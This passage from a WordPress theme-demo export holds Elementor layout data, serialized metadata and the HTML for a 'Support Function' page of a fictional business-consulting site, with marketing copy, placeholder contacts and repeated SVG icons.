Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05b9e13","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"9ff3f8e","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"2a1f3b6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home3.png","id":1701},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"5c20bfd","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"a5714fa","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #d92300;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b7198e9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"a53f436","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"d016178","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"676aa62","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"aee7a43","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"8dd2aa8","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"67ff888","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"3da52cb","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#D92300","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4ffbddf","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"ecb740e","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"b0441a2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"00f028b","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9c23145","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"758fa65","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"d84b707","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1aa5536","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7cf28b7","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c141a94","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home3.jpg","id":1705},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"72003dd","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"1ee9682","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"fed6d32","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#D92300","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"dded707","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"0ed62a5","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"9da83a9","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"846a182","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1921]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Support Function</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/support-function/</link>
		<pubDate>Tue, 22 Sep 2020 02:54:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=999</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home3-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
